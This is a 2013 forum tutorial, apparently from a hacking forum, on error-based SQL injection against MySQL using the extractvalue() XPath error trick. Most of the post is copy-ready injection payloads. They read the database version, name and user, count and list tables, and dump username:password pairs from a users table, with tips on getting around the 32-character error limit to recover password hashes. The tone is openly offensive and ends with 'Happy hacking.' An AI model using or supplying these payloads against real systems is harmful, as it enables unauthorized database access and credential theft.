Error-Based sql injection (a "new" approach) 09-30-2013, 01:47 PM
Error-Based sql injection
(a "new" approach)
(a "new" approach)
It's with great exitement that I'm writing this little tutorial. I have been messing around with SQL injection for a while, and there's nothing I love more in hacking than sql injection. But that being said, I fucking hate error based injection. A million nested select queries that you cannot even remember just to get the database version. Always having to keep the cheat sheet at hand. So after messing around a lot I have come across a method that is so much easier.
FIrst I will show an example that show's the old way and the new way. They are both doing the same thing, grabbing the database version
Old code:
' and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)
New code:
' and extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))
As you can see, we get the exact same result. The only thing is that we're now using the XPath errors to display the content.
One thing to keep in mind, the XPath errors will show you results up to 32 characters, so if you're for example extracting sha1 hashed passwords you need to use substring to get the content.. Also keep in mind, we're adding a \ to create the error, so you're only seeing 31 characters or the query output.
Enough talk, let's get our hands dirty.
As shown above here's the code to get the database version
extractvalue('%3Cxml%3E',concat(%22\\%22,(select version())))
Database and user
extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat_ws('~',database(),user()))))
Find number of tables in current database
extractvalue('%3Cxml%3E',concat(%22\\%22,(select count(*) from information_schema.tables where table_schema=database())))
Get the names of all the tables (change the first number in limit to get the next table name)
extractvalue('%3Cxml%3E',concat(%22\\%22,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))
Extract content from a database (Just like the code above, increment the first number in the LIMIT clause to get the next result)
extractvalue('%3Cxml%3E',concat(%22\\%22,(select concat(username,':',password) from users limit 0,1)))
As you can see here, there's no need to be SQL guru to write error based SQL injections! You can really do whatever you want. Writing completely advanced queries inside the concat.
Another thing as well, when working with integer values you can inject this directly as the parameter like this
Code:'<xml>',concat("\\",(select concat(username,':',password) from users limit 0,1)))
I hope you enjoyed this tutorial
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Happy hacking